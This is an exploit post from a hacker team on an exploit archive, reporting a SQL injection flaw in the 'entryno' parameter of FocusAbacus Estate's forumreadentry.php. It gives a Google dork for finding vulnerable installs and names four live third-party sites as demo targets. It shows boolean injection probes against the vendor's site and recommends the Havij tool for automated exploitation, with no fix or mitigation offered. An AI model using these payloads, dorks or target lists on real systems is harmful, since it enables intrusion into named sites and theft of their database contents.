FocusAbacus Estate - Remote SQL Injection Vulnerability

2012-11-07T00:00:00
ID 1337DAY-ID-19703
Type zdt
Reporter KnocKout
Modified 2012-11-07T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            FocusAbacus Estate - Remote SQL Injection Vulnerability
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : mr.inj3ct0r[at]gmail.com                      1
0                                                                      0
1               #########################################              1
0               I'm KnocKout member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : [email protected]
[~] HomePage : 1337day.com / h4x0resec.blogspot.com / Cyber-warrior.org 
[~] Reference : http://h4x0resec.blogspot.com
[~] Say : "Have you forgotten me, brothers and sisters?"
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : FocusAbacus Estate
|~Price : N/A
|~Version : ALL
|~Software Official : http://www.focusabacus.net
|~Vulnerability : SQL Injection
|~Vulnerability Dir : /
|~Risk : Critical 
|~Google DORK : inurl:forumreadentry.php?entryno=
|[~]Date : "07.11.2012"
|[~]Tested on : (focusabacus.net)
Web Server: 	Apache/2.2.22
Powered-by: 	PHP/5.3.15
Sql Version: 	5.1.26-rc-5.1.26rc-log
----------------------------------------------------------
forumreadentry.php <= 'entryno' Functions Not Security
---------------------------------------------------------
Demo:
http://www.emlak.im/forumreadentry.php?entryno=1227
http://www.hypercommune.com/forumreadentry.php?entryno=174
http://www.aqaratona.com/forumreadentry.php?entryno=1364
http://www.vnnhadat.net/forumreadentry.php?entryno=792
..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============================================================
|{~~~~~~~~ Explotation| SQL Injection ~~~~~~~~~~}|
 
http://www.focusabacus.net/forumreadentry.php?entryno=152 and 1=1
http://www.focusabacus.net/forumreadentry.php?entryno=152 and 1=2

Automatic It is recommended for use HAVIJ
 
================================================================

#  0day.today [2018-02-18]  #